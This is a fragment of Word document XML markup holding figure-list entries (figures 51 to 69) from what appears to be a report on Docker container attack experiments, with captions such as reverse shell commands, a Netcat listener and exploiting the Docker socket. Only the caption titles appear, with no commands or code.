        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867531 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49E6E84D" w14:textId="4001285B"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32" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 51: Attacker2 container.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867532 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A6A9FC0" w14:textId="777CA81B"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33" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 52: All running containers.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867533 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="277F510F" w14:textId="479CC179"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34" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 53: IP addresses of the running containers.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867534 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A556ACA" w14:textId="4A28117D"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35" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 54: Accessing the /etc/passwd directory on the web server.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867535 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19EEA605" w14:textId="48CEFBC7"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36" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 55: reverse shell commands.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867536 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7363D119" w14:textId="31ADDA5A"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37" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 56: Netcat listener on Attacker2 container.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867537 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5759B0A1" w14:textId="6D0CD5FD"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38" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 57: Attacker lists the files on the target container.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867538 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26D9F6C4" w14:textId="716F6C09"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39" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 58:Before the attack</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867539 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12DC94B9" w14:textId="0258ADF3"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40" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 59: A container launched based on the base image attacker.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867540 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>57</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="334236AE" w14:textId="63CDBFEC"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41" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 60: After the attack.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867541 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>57</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E3870E7" w14:textId="4039FD0A"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42" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 61: A container accessing via ssh to non-ssh container.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867542 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26501088" w14:textId="004EA433"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43" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 62: Exploiting Docker socket.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867543 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6896F73D" w14:textId="32C10036"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44" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 63: Identifying Docker images on the host via the Docker socket.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867544 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>59</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0297C418" w14:textId="1BE84C63"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45" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 64: Creating a container mapped to the host directory.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867545 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>59</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="134A7389" w14:textId="631C4EE0"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46" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 65: Surfing on the host directories.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867546 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>59</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A3F05B2" w14:textId="71D647D4"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47" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 66: Accessing the /etc/passwd file directory.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867547 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4ECA4D9D" w14:textId="61F89272"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48" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 67: Script to execute reverse shell.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867548 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4210529B" w14:textId="7DE179DE"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49" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 68: The Listener.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867549 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="073DE498" w14:textId="23BF570C"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50" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 69: sample Gantt chart with all the tasks.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
